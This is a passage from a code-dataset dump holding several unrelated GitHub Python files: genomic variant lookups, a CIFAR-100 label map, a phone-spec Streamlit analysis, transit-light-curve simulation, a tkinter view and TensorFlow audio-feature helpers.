\"Error\"\n else:\n job_status = \"success\"\n results_output = parse_weather_temp(weather_status)\n\n # 每個function 都要做的事\n current_job.update_job_status(job_status)\n current_job.update_result_output(results_output)\n current_job.update_end_time()\n\n queue_obj.update_job_status(current_job)\n queue_obj.put_to_sqs()\n\n return {\"lambda msg\": results_output}\n","repo_name":"tzutingspace/functionflow_lambda","sub_path":"lambda/code/fn/get_weather/get_weather.py","file_name":"get_weather.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"22190345790","text":"# -*- mode: python -*-\r\n\r\nblock_cipher = None\r\n\r\n\r\na = Analysis(['inpy.py'],\r\n pathex=['D:\\\\inPy(sdk,exe°æ±¾,printÖÐÎİæ)'],\r\n binaries=[],\r\n datas=[],\r\n hiddenimports=[],\r\n hookspath=[],\r\n runtime_hooks=[],\r\n excludes=[],\r\n win_no_prefer_redirects=False,\r\n win_private_assemblies=False,\r\n cipher=block_cipher)\r\npyz = PYZ(a.pure, a.zipped_data,\r\n cipher=block_cipher)\r\nexe = EXE(pyz,\r\n a.scripts,\r\n a.binaries,\r\n a.zipfiles,\r\n a.datas,\r\n name='inpy',\r\n debug=False,\r\n strip=False,\r\n upx=True,\r\n runtime_tmpdir=None,\r\n console=True )\r\n","repo_name":"dohooo/pdf2excel","sub_path":"inpy.spec","file_name":"inpy.spec","file_ext":"spec","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28065918936","text":"#!/usr/bin/env python3\n#===============================================================================\n# hg19.py\n#===============================================================================\n\n\"\"\"Get the coordinates of a variant from its RSID, or an RSID from its\ncoordinates. \n\nExamples\n--------\nrs10_coord = coord('rs10')\nprint(\n 'rs10 is on chromosome {0.chr} at position {0.pos}'\n .format(rs10_coord)\n)\n\nrs10_coord_tuple = coord_tuple('rs10')\nprint(\n 'rs10 is on chromosome {} at position {}'\n .format(rs10_coord_tuple[0], rs10_coord_tuple[1])\n)\n\nrs_something = rsid(chr=1, pos=10019)\nprint(\n 'The RSID of the variant on chromosome 1 at position 10019 is {}.'\n .format(rs_something)\n)\n\nNotes\n-----\nThis module might be a good place to put more utilities later.\n\ncoord() returns a fancy object, which is useful for writing readable code. \n\ncoord_tuple() returns a tuple, which is more lightweight and useful for going\nfast.\n\nrsid() returns an RSID.\n\nClasses\n-------\nDataDirectory\n storage class for data directory configuration\nCoordinates\n The coordinates of a variant\n\nFunctions\n---------\ncoord\n get the coordinates and return them as an object\ncoord_tuple\n get the coordinates and return them as a tuple\nrsid\n get the rsid and return it as a string\n\nGlobal\n------\npath\n absolute path to the hg19 reference genome\n\"\"\"\n\n\n\n\n# Imports ======================================================================\n\nimport gzip\nimport subprocess\nimport os.path\nimport socket\n\n\n\n\n# Constants ====================================================================\n\nHOSTNAME = socket.gethostname()\n\nPATH = (\n '/data2/broad-resource-bundle-hg19/ucsc.hg19.fasta'\n if\n HOSTNAME == 'holden'\n else\n '/home/data/broad-resource-bundle-hg19/ucsc.hg19.fasta'\n)\n\nSORTED_BY_RSID_FORMAT = (\n '/data2/dbSNP/sorted-by-rsid/{}.bed.gz'\n if\n HOSTNAME == 'holden'\n else\n '/home/data/dbSNP/sorted-by-rsid/{}.bed.gz'\n)\n\nSORTED_BY_COORD_PATH = (\n '/data2/dbSNP/dbSNP150.rsid.bed.gz'\n if\n HOSTNAME == 'holden'\n else\n '/home/data/dbSNP/dbSNP150.rsid.bed.gz'\n)\n\n\n\n\n# Classes ======================================================================\n\nclass Coordinates():\n \"\"\"The coordinates of a variant\"\"\"\n \n def __init__(self, chr, pos):\n self.chr = chr\n self.pos = pos\n self.tuple = chr, pos\n \n def __repr__(self):\n return 'Coordinates(chr={}, pos={})'.format(self.chr, self.pos)\n\n\nclass Variant():\n \"\"\"The id and coordinates of a variant\"\"\"\n \n def __init__(self, id, chr, pos):\n self.id = id\n self.chr = chr\n self.pos = pos\n self.tuple = id, chr, pos\n \n def __repr__(self):\n return 'Variant(id={}, chr={}, pos={})'.format(\n self.id,\n self.chr,\n self.pos\n )\n\n\n\n\n# Functions ====================================================================\n\ndef coord(rsid):\n \"\"\"Get the coordinates and return them as an object\"\"\"\n \n chr, pos = coord_tuple(rsid)\n return Coordinates(chr, pos)\n\n\ndef coord_tuple(rsid):\n \"\"\"Get the coordinates and return them as a tuple\"\"\"\n \n with subprocess.Popen(\n ('zcat', SORTED_BY_RSID_FORMAT.format(rsid[:4])),\n stdout=subprocess.PIPE\n ) as zcat:\n with subprocess.Popen(\n (\n 'awk',\n '$4==\"{}\" {{print; exit}}'.format(rsid)\n ),\n stdin=zcat.stdout,\n stdout=subprocess.PIPE\n ) as awk:\n dbsnp_line, _ = awk.communicate()\n try:\n chr, _, pos, _, _, _ = dbsnp_line.decode().split('\\t')\n except ValueError:\n raise ValueError(\n '{} was not found in the database'.format(rsid)\n )\n return chr[3:], int(pos)\n\n\ndef rsid(chr, pos):\n \"\"\"Get the rsid and return it as a string\"\"\"\n \n with subprocess.Popen(\n (\n 'tabix',\n SORTED_BY_COORD_PATH,\n 'chr{0}:{1}-{1}'.format(str(chr).replace('chr', ''), pos)\n ),\n stdout=subprocess.PIPE\n ) as tabix:\n dbsnp_line, _ = tabix.communicate()\n try:\n _, _, _, rsid, *rest = dbsnp_line.decode().split('\\t')\n except ValueError:\n raise ValueError(\n 'A variant at chromosome {}, position {} was not found in the '\n 'database'\n .format(chr, pos)\n )\n return rsid\n\n\ndef range(chr, start, end):\n \"\"\"Generate all variants within a given genomic range\"\"\"\n \n with subprocess.Popen(\n (\n 'tabix',\n SORTED_BY_COORD_PATH,\n 'chr{0}:{1}-{2}'.format(str(chr).replace('chr', ''), start, end)\n ),\n stdout=subprocess.PIPE\n ) as tabix:\n dbsnp_lines, _ = tabix.communicate()\n for dbsnp_line in dbsnp_lines.decode().splitlines():\n chr, _, pos, rsid, *rest = dbsnp_line.split('\\t')\n yield Variant(rsid, chr.replace('chr', ''), int(pos))\n\n\ndef generate_coord_rsid_pairs(file):\n for line in file:\n chr, _, pos, rsid, *alleles = line.split()\n yield (chr.replace('chr', ''), int(pos)), rsid\n\n\ndef coord_rsid_dict():\n \"\"\"A dictionary containing coord: rsid pairs\"\"\"\n \n with gzip.open(SORTED_BY_COORD_PATH, 'rt') as f:\n return dict(generate_coord_rsid_pairs(f))\n\n\n\n\n# test =========================================================================\n\nif __name__ == '__main__':\n rs10_coord = coord('rs10')\n print(\n 'rs10 is on chromosome {0.chr} at position {0.pos}'\n .format(rs10_coord)\n )\n\n rs10_coord_tuple = coord_tuple('rs10')\n print(\n 'rs10 is on chromosome {} at position {}'\n .format(rs10_coord_tuple[0], rs10_coord_tuple[1])\n )\n \n rs_something = rsid(chr=1, pos=10019)\n print(\n 'The RSID of the variant on chromosome 1 at position 10019 is {}.'\n .format(rs_something)\n )\n \n try:\n coord('rs10a')\n except ValueError:\n print('error was handled')\n","repo_name":"kjgaulton/pipelines","sub_path":"kglab-python3-modules/hg19.py","file_name":"hg19.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"21"} +{"seq_id":"6889485913","text":"SUPER_TO_FINE = {\n 'aquatic mammals': {'beaver', 'dolphin', 'otter', 'seal', 'whale'},\n 'fish': {'aquarium_fish', 'flatfish', 'ray', 'shark', 'trout'},\n 'flowers': {'orchid', 'poppy', 'rose', 'sunflower', 'tulip'},\n 'food containers': {'bottle', 'bowl', 'can', 'cup', 'plate'},\n 'fruit and vegetables': {'apple', 'mushroom', 'orange', 'pear', 'sweet_pepper'},\n 'household electrical devices': {'clock', 'computer', 'keyboard', 'lamp', 'telephone', 'television'},\n 'household furniture': {'bed', 'chair', 'couch', 'table', 'wardrobe'},\n 'insects': {'bee', 'beetle', 'butterfly', 'caterpillar', 'cockroach'},\n 'large carnivores': {'bear', 'leopard', 'lion', 'tiger', 'wolf'},\n 'large man-made outdoor things': {'bridge', 'castle', 'house', 'road', 'skyscraper'},\n 'large natural outdoor scenes': {'cloud', 'forest', 'mountain', 'plain', 'sea'},\n 'large omnivores and herbivores': {'camel', 'cattle', 'chimpanzee', 'elephant', 'kangaroo'},\n 'medium-sized mammals': {'fox', 'porcupine', 'possum', 'raccoon', 'skunk'},\n 'non-insect invertebrates': {'crab', 'lobster', 'snail', 'spider', 'worm'},\n 'people': {'baby', 'boy', 'girl', 'man', 'woman'},\n 'reptiles': {'crocodile', 'dinosaur', 'lizard', 'snake', 'turtle'},\n 'small mammals': {'hamster', 'mouse', 'rabbit', 'shrew', 'squirrel'},\n 'trees': {'maple_tree', 'oak_tree', 'palm_tree', 'pine_tree', 'willow_tree'},\n 'vehicles 1': {'bicycle', 'bus', 'motorcycle', 'pickup_truck', 'train'},\n 'vehicles 2': {'lawn_mower', 'rocket', 'streetcar', 'tank', 'tractor'},\n}\n\n\n# FINE_TO_SUPER = {}\n# SUPER_TO_IDX = {}\n# TEST_LABELS_LG = set()\n# for i, (super_class,fine_classes) in enumerate(SUPER_TO_FINE.items()):\n# SUPER_TO_IDX[super_class] = i\n \n# for fine_class in fine_classes:\n# FINE_TO_SUPER[fine_class] = super_class\n \n# TEST_LABELS_LG.update(set(sorted(list(fine_classes),reverse=True)[:1]))\n\n# print('Number of held out classes: ', len(TEST_LABELS_LG))","repo_name":"BigRedT/vico","sub_path":"exp/cifar100/test_labels.py","file_name":"test_labels.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"10450486302","text":"#11724 연결 요소의 개수\n# 희소한 그래프의 경우에는 인접리스트가 훨씬 빠르다\n\nimport sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(start):\n for i in range(vertex):\n if graph[start][i] == 1 and visit[i] == 0:\n visit[i] = 1\n dfs(i)\n\n\nvertex, edge = map(int,sys.stdin.readline().split())\ngraph =[[0]*vertex for _ in range(vertex)]\nvisit = [0]*vertex\ncount = 0\n\nfor _ in range(edge):\n st,ed = map(int,sys.stdin.readline().split())\n graph[st-1][ed-1] = 1\n graph[ed-1][st-1] = 1\n\nfor i in range(vertex):\n if visit[i] == 0:\n count += 1\n dfs(i)\n\n\nprint(count)\n\n\n\n\n","repo_name":"inkyu0103/BOJ","sub_path":"DFS , BFS/11724.py","file_name":"11724.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71218983732","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport altair as alt\r\nfrom altair import Color, Scale\r\n\r\ndf = pd.read_csv(\"Mobile Classification Data/train.csv\")\r\n\r\nst.markdown(\r\n \"<h1 style='text-align: center; color: MediumSeaGreen;'>Mobile Phone Specs EDA</h1>\",\r\n unsafe_allow_html=True,\r\n)\r\n\r\nst.markdown(\r\n \"<h1 style='text-align: center; color: #2596be; font-size: 19px;'><i>by Yashwant Jankay</i></h1>\",\r\n unsafe_allow_html=True,\r\n)\r\n\r\n\r\nst.subheader(\"Here is a snapshot of the dataset:\")\r\nst.write(df.head())\r\n\r\nst.markdown(\r\n \"\"\"\r\n| Column Name | Description |\r\n| :-------------: |:-------------:| \r\n| battery_power | Total energy a battery can store in one time measured in mAh | \r\n| blue | Has bluetooth or not | \r\n| clock_speed | speed at which microprocessor executes instructions | \r\n| dual_sim | Has dual sim support or not | \r\n| fc | Front Camera mega pixels | \r\n| four_g | Has 4G or not | \r\n| int_memory | Internal Memory in Gigabytes | \r\n| m_dep | Mobile Depth in cm | \r\n| mobile_wt | Weight of mobile phone | \r\n| n_cores | Number of cores of processor | \r\n| pc | Primary Camera mega pixels | \r\n| px_height | Pixel Resolution Height | \r\n| px_width | Pixel Resolution Width | \r\n| ram | Random Access Memory in Mega Bytes | \r\n| sc_h | Screen Height of mobile in cm | \r\n| sc_w | Screen Width of mobile in cm | \r\n| talk_time | longest time that a single battery charge will last on a phone call | \r\n| three_g | Has 3G or not | \r\n| touch_screen | Has touch screen or not | \r\n| wifi | Has wifi or not | \r\n| price_range | This is the target variable with value of 0(low cost), 1(medium cost), 2(high cost) and 3(very high cost) | \r\n\r\n\"\"\"\r\n)\r\n\r\nst.markdown(\"\\n\")\r\nst.markdown(\"\\n\")\r\n\r\nfig1 = plt.figure()\r\nsns.boxenplot(df.price_range, df.ram)\r\nplt.ylabel(\"RAM (in MB)\")\r\nplt.xlabel(\"Price\")\r\nplt.xticks(ticks=[0, 1, 2, 3], labels=[\"Low\", \"Medium\", \"High\", \"Very High\"])\r\n\r\nst.markdown(\r\n \"<span style='color:MediumVioletRed'><u> **Exploratory Data Analysis:** </u></span>\",\r\n unsafe_allow_html=True,\r\n)\r\nst.markdown(\r\n \"Our primary focus will be - determing the **_relationships among features_**.\"\r\n)\r\nst.markdown(\"**Conclusively, we will evaluate whether this dataset is real or not.**\")\r\n\r\nst.markdown(\"Let's start with a Box plot of **Price** vs **RAM**\")\r\n\r\nst.write(fig1)\r\n\r\nst.markdown(\r\n \"RAM size and phone price are *__positively correlated__*! This makes intuitive sense.\"\r\n)\r\n\r\nst.markdown(\r\n \"Now a look at a Bar plot of **Number of phones that have a Touch Screen** and **color coding them with their respective price ranges**:\"\r\n)\r\n\r\nfig2 = plt.figure()\r\nsns.set_style(\"whitegrid\")\r\nsns.countplot(df.touch_screen, hue=df.price_range, palette=\"spring\")\r\nplt.xlabel(\"Touch Screen\")\r\nplt.xticks(ticks=[0, 1], labels=[\"No\", \"Yes\"])\r\nplt.legend(\r\n labels=[\"Low\", \"Moderate\", \"High\", \"Very High\"],\r\n shadow=True,\r\n loc=\"lower right\",\r\n title=\"Price\",\r\n fontsize=\"small\",\r\n)\r\n\r\nst.write(fig2)\r\n\r\nst.markdown(\r\n \"It appears that phones with touchscreens and no touchscreens are almost equally \\\r\n distributed among different price ranges. However, **it makes little sense that there\\\r\n are such a large number of _high_ and _very high_ priced phones with no touchscreens!** \\\r\n (in fact higher than their corresponding _low_ and _modernate_ price categories)\"\r\n)\r\n\r\nst.markdown(\r\n \"Next we are going to engineer a new feature! Dividing the pixel \\\r\n resolution height (*px_height*) by screen height in cm (*sc_h*) - we get \\\r\n pixels per cm of height. For simplicity, we will call this ** ppcm ** . \"\r\n)\r\n\r\ndf[\"ppcm\"] = df.px_height / df.sc_h\r\n\r\nst.write(df[[\"px_height\", \"sc_h\", \"ppcm\"]].head())\r\n\r\nst.markdown(\"Let's observe the median of ppcm of different price categories-\")\r\n\r\nfig3 = plt.figure()\r\nsns.set_style(\"darkgrid\")\r\nsns.barplot(df.price_range, df.ppcm, palette=\"ocean\")\r\nplt.ylabel(\"Median pixels per cm\")\r\nplt.xlabel(\"Price\")\r\nplt.xticks(ticks=[0, 1, 2, 3], labels=[\"Low\", \"Medium\", \"High\", \"Very High\"])\r\n\r\nst.write(fig3)\r\n\r\nst.markdown(\r\n \"_Low_ priced phones have a lower pixels per cm as compared to _High_ and _Very \\\r\n High_ priced phones. With the excpetion of _Moderately_ priced phones - where the \\\r\n median of ppcm is higher than that of _High_ priced phones, there seems to be a clear \\\r\n upward trend - **higher priced phones have a higher pixel density, which is the \\\r\n result of a sharper screen resolution.** This makes perfect intuitive sense as well!\"\r\n)\r\n\r\n\r\n# figx = alt.Chart(df).mark_point().encode(alt.X(\"pc:Q\"), alt.Y(\"fc:Q\"),)\r\n\r\n# st.altair_chart(figx, use_container_width=True)\r\n\r\nfig4 = plt.figure()\r\nsns.set_style(\"whitegrid\")\r\nsns.pointplot(\r\n df.four_g,\r\n df.clock_speed,\r\n hue=df.price_range,\r\n scale=1.3,\r\n dodge=True,\r\n palette=\"Set1\",\r\n)\r\nplt.ylabel(\"Processor Clock Speed (GHz)\")\r\nplt.xlabel(\"4G Enabled\")\r\nplt.xticks(ticks=[0, 1], labels=[\"No\", \"Yes\"])\r\nplt.legend(\r\n shadow=True, title=\"Price\", fontsize=\"small\",\r\n)\r\n\r\nst.write(fig4)\r\n\r\nst.markdown(\r\n \"An interesting trend that can be observed here is that category **_3_** priced \\\r\n (very high priced) phones have a higher clock speed on non - 4G enabled phones as \\\r\n compared to 4G enabled phones. \\\r\n This seems a little weird - as 4G enabled phones need faster (higher) clock rates\\\r\n than non - 4G enabled phones. This trend appears to be inverse for very high priced\\\r\n phones.\"\r\n)\r\n\r\n\r\nst.markdown(\r\n \"The next visualization is unfortunately our last - but it is special - it is interactive!\\\r\n We will take a look at ** RAM ** vs ** pixels per cm ** feature that we engineered earlier.\\\r\n Below this scatterplot, there is going to be a bar chart denoting the number of mobile phones\\\r\n belonging to that price range. This bar chart changes with the area selected on the scatterplot.\\\r\n *Please note that this is an interactive plot, so please go ahead and make a selection\\\r\n on the plot and watch the bar chart below change!*\"\r\n)\r\n\r\nbrush = alt.selection(type='interval')\r\n\r\npoints = alt.Chart(df).mark_point().encode(\r\n x='ram:Q',\r\n y='ppcm:Q',\r\n color=alt.condition(brush, 'price_range:N', alt.value('lightgray'))\r\n).properties(\r\n width=700,\r\n height=400).add_selection(\r\n brush\r\n)\r\n\r\nbars = alt.Chart(df).mark_bar().encode(\r\n y='price_range:N',\r\n color='price_range:N',\r\n x='count(price_range):Q'\r\n).properties(\r\n width=700).transform_filter(\r\n brush\r\n)\r\n\r\nst.altair_chart(points & bars, use_container_width=True)\r\n\r\nst.markdown(\"Ideally, the trend needs to upwards and positive - as expensive phones have higher pixel densities \\\r\nand more RAM. But there is something very unsettling here. We can observe that there are some phones which are in \\\r\n the ** very high (3)** price range and still have pretty poor pixel densities \\\r\n (lower right section of the scatterplot, populated by blue circles). This is not the case in a real world scenario. \\\r\n Such phones rarely get released and have extremely limited scope to attract customers generate revenue. \")\r\n\r\nst.markdown(\"\\n\")\r\n\r\nst.markdown(\"** Our final conclusion is that apart from the RAM feature, the other features _do NOT reflect real-world phone feature vs price relationships._\\\r\n This dataset might be synthetically generated with RAM being the only properly correlated feature. **\")","repo_name":"yashwantreddy/MobilePhones","sub_path":"streamlit_demo.py","file_name":"streamlit_demo.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19632002379","text":"import matplotlib.pyplot as plt\nimport george\nimport itertools\nimport numpy as np\nimport batman\nimport os\n\ndef reverse_ld_coeffs(ld_law, q1, q2):\n if ld_law == 'quadratic':\n coeff1 = 2.*np.sqrt(q1)*q2\n coeff2 = np.sqrt(q1)*(1.-2.*q2)\n elif ld_law=='squareroot':\n coeff1 = np.sqrt(q1)*(1.-2.*q2)\n coeff2 = 2.*np.sqrt(q1)*q2\n elif ld_law=='logarithmic':\n coeff1 = 1.-np.sqrt(q1)*q2\n coeff2 = 1.-np.sqrt(q1)\n elif ld_law == 'linear':\n return q1,q2\n return coeff1,coeff2\n\ndef init_batman(t,law):\n \"\"\" \n This function initializes the batman code.\n \"\"\"\n params = batman.TransitParams()\n params.t0 = 0. \n params.per = 1. \n params.rp = 0.1 \n params.a = 15. \n params.inc = 87. \n params.ecc = 0. \n params.w = 90. \n if law == 'linear':\n params.u = [0.5]\n else:\n params.u = [0.1,0.3]\n params.limb_dark = law \n m = batman.TransitModel(params,t)\n return params,m\n\ndef get_transit_model(t,t0,P,p,a,inc,q1,q2,ld_law):\n params,m = init_batman(t,law=ld_law)\n coeff1,coeff2 = reverse_ld_coeffs(ld_law, q1, q2) \n params.t0 = t0\n params.per = P \n params.rp = p \n params.a = a\n params.inc = inc\n if ld_law == 'linear':\n params.u = [coeff1]\n else:\n params.u = [coeff1,coeff2]\n return m.light_curve(params)\n\ninputs = np.genfromtxt('w19_parameters.dat',unpack=True)\n\n# Standarize the inputs:\nfor i in range(len(inputs)):\n norm_input = (inputs[i] - np.mean(inputs[i]))/np.sqrt(np.var(inputs[i]))\n if i == 0:\n X = norm_input\n times = inputs[i]\n else:\n X = np.vstack((X,norm_input))\n\n# Define base flux (white) noise:\nsigma = 200*1e-6\nyerr = np.ones(len(times))*sigma\n\n# Define maximum variance (i.e., the total variance of the GP):\nmax_sigma = 2000.\nmax_var = (max_sigma*1e-6)**2\n\n# Define number of simulations:\nnsims = 300\n\n# Define transit model:\nt0 = times[len(times)/2]\nP = 3.0\np = 0.1\naR = 10.\ninc = 88.0\nq1,q2 = 0.5,0.5\nmodel = get_transit_model(times.astype('float64'),t0,P,p,aR,inc,q1,q2,'quadratic')\n\n# Name of the variables:\nnames = ['times','Deltas','FWHM','Z','g','trace']\nidx_names = range(len(names))\n\n# Generate all possible combinations of external parameters, and generate datasets:\nfor L in range(0, len(idx_names)+1):\n for subset in itertools.combinations(idx_names, L):\n if len(subset) != 0:\n for n in range(nsims):\n if n == 0:\n cnames = list( names[i] for i in subset)\n fname = '_'.join(cnames)\n os.mkdir(fname)\n fout = open(fname+'/dataset_'+str(n)+'.dat','w')\n # Generate nsims datasets per model:\n Xc = X[subset,:]\n # Generate gaussian process. For this, sample lambdas from uniform distribution:\n ndim = Xc.shape[0]\n lambdas = np.random.uniform(0,10,ndim)\n fout.write('# Lambdas: '+' '.join(lambdas.astype('str'))+' | Sigma: '+str(sigma*1e6)+' ppm | Max (GP) Sigma: '+str(max_sigma)+' ppm\\n')\n fout.write('# Times \\t Simulated data \\t Transit Model \\t GP\\n')\n # Compute kernel:\n kernel = max_var*george.kernels.ExpSquaredKernel(lambdas,ndim=ndim,axes=range(ndim))\n # Prepare GP object:\n gp = george.GP(kernel)\n gp.compute(Xc.T)\n # Sample GP, add gaussian noise and save\n GP = gp.sample(Xc.T)\n noise = np.random.normal(0.,sigma,len(times))\n total = model + GP + noise\n for i in range(len(times)):\n fout.write('{0:.10f} \\t {1:.10f} \\t {2:.10f} \\t {3:.10f}\\n'.format(times[i],total[i],model[i],GP[i]))\n","repo_name":"nespinoza/GPOS","sub_path":"data_generator/generate_datasets.py","file_name":"generate_datasets.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26371789215","text":"import tkinter as tk\nfrom tkinter import Frame, ttk\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\n\nclass Vista_Pestaña1:\n def __init__(self, controlador):\n self.controlador = controlador\n\n self.ventanaP1 = tk.Tk()\n self.ventanaP1.title(\"Datos Generales\")\n self.ventanaP1.geometry(\"1200x700\")\n self.ventanaP1.resizable(False, False)\n\n self.main_frame = tk.Frame(self.ventanaP1)\n self.main_frame.pack(fill=tk.BOTH, expand=True)\n\n self.left_frame = tk.Frame(self.main_frame)\n self.left_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n self.right_frame = tk.Frame(self.main_frame)\n self.right_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n self.create_treeview()\n self.create_plot()\n self.label1 = tk.Label(self.left_frame, text=\"Nombre del archivo\")\n self.label1.pack()\n self.entry1 = tk.Entry(self.left_frame)\n self.entry1.pack()\n self.crear_boton()\n def agregar_datosarbolpestaña1(self, datos):\n for fila in self.tree1.get_children():\n self.tree1.delete(fila)\n for indice, fila in enumerate(datos):\n valores = fila\n self.tree1.insert('', 'end', text=str(indice), values=valores)\n def create_treeview(self):\n self.tree1 = ttk.Treeview(self.right_frame, height=20)\n self.tree1['columns'] = ('Columna1', 'Columna2', 'Columna3','Columna4')\n\n self.tree1.heading('#0', text='Índice')\n self.tree1.column('#0', anchor=tk.CENTER, width=80)\n self.tree1.heading('Columna1', text='Fuerza Horizontal \\n N')\n self.tree1.column('Columna1', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna2', text='Desplazamiento Horizontal \\n mm')\n self.tree1.column('Columna2', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna3', text='Desplazamiento Vertical \\n mm')\n self.tree1.column('Columna3', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna4', text='Esfuerzo cortante')\n self.tree1.column('Columna4', anchor=tk.CENTER, width=100)\n self.tree1.pack(side=tk.LEFT, padx=10, pady=10)\n\n def create_plot(self):\n fig1 = Figure(figsize=(5, 4), dpi=100)\n ax1 = fig1.add_subplot(111)\n x = [0, 0.4, 0.8, 1.2, 1.6, 2, 2.4, 2.8, 3.2, 3.6, 4]\n y = [0, 3.514132926, 5.551311434, 6.977336389, 7.894066718, 8.148714031, 8.148714031, 8.148714031, 8.148714031,\n 8.148714031, 8.148714031]\n ax1.scatter(x, y)\n ax1.plot(x, y, 'r-') # 'r-' indica una línea roja\n\n canvas = FigureCanvasTkAgg(fig1, master=self.left_frame)\n canvas.draw()\n canvas.get_tk_widget().pack(padx=10, pady=10)\n def crear_boton(self):\n self.boton = tk.Button(self.left_frame, text=\"Generar Graficas\", command=self.controlador.generar_pdf,\n width=25, height=5, borderwidth=2)\n self.boton.pack()\n def obtener_nombreArchivo(self):\n return self.entry1.get()\n def cerrar_pestaña(self):\n self.ventanaP1.destroy()\n def iniciar(self):\n self.ventanaP1.mainloop()","repo_name":"yair-r/nueva_MCD","sub_path":"Vista/vista_pestaña1.py","file_name":"vista_pestaña1.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71807424374","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport librosa as lb\nfrom librosa.display import specshow\n\n# Drop axis since data is only single channel\ndef squeeze(audio, labels):\n audio = tf.squeeze(audio, axis=-1)\n #audio = tf.expand_dims(audio, axis=-1)\n return audio, labels\n\ndef get_features(waveform, sample_rate):\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrogram = tf.abs(stfts)\n\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrogram = tf.tensordot(\n spectrogram, linear_to_mel_weight_matrix, 1)\n mel_spectrogram.set_shape(spectrogram.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n # Compute a stabilized log to get log-magnitude mel-scale spectrograms.\n log_mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)\n # Compute MFCCs from log_mel_spectrograms and take the first 13.\n mfcc = tf.signal.mfccs_from_log_mel_spectrograms(\n log_mel_spectrogram)[..., :128]\n\n features = tf.stack([spectrogram, mel_spectrogram, mfcc], axis=-1)\n #all_four = tf.squeeze(all_four, axis=1)\n return features\n\n\ndef get_spectrogram(waveform):\n # Convert the waveform to a spectrogram via a STFT.\n spectrogram = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n # Obtain the magnitude of the STFT.\n spectrogram = tf.abs(spectrogram)\n # Add a `channels` dimension, so that the spectrogram can be used\n # as image-like input data with convolution layers (which expect\n # shape (`batch_size`, `height`, `width`, `channels`).\n spectrogram = spectrogram[..., tf.newaxis]\n return spectrogram\n\ndef get_melspec(waveform, sample_rate):\n # A 1024-point STFT with frames of 64 ms and 75% overlap.\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrograms = tf.abs(stfts)\n\n # Warp the linear scale spectrograms into the mel-scale.\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrograms = tf.tensordot(\n spectrograms, linear_to_mel_weight_matrix, 1)\n mel_spectrograms.set_shape(spectrograms.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n mel_spectrograms = mel_spectrograms[..., tf.newaxis]\n\n return mel_spectrograms\n\ndef get_mfcc(waveform, sample_rate):\n\n # A 1024-point STFT with frames of 64 ms and 75% overlap.\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrograms = tf.abs(stfts)\n\n # Warp the linear scale spectrograms into the mel-scale.\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrograms = tf.tensordot(\n spectrograms, linear_to_mel_weight_matrix, 1)\n mel_spectrograms.set_shape(spectrograms.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n # Compute a stabilized log to get log-magnitude mel-scale spectrograms.\n log_mel_spectrograms = tf.math.log(mel_spectrograms + 1e-6)\n # Compute MFCCs from log_mel_spectrograms and take the first 13.\n mfccs = tf.signal.mfccs_from_log_mel_spectrograms(\n log_mel_spectrograms)[..., :13]\n mfccs = mfccs[..., tf.newaxis]\n\n return mfccs\n\n# Function to display spectrogram\ndef plot_spectrogram(spectrogram, ax):\n if len(spectrogram.shape) > 2:\n assert len(spectrogram.shape) == 3\n spectrogram = np.squeeze(spectrogram, axis=-1)\n # Convert the frequencies to log scale and transpose, so that the time is\n # represented on the x-axis (columns).\n # Add an epsilon to avoid taking a log of zero.\n log_spec = np.log(spectrogram.T + np.finfo(float).eps)\n height = log_spec.shape[0]\n width = log_spec.shape[1]\n X = np.linspace(0, np.size(spectrogram), 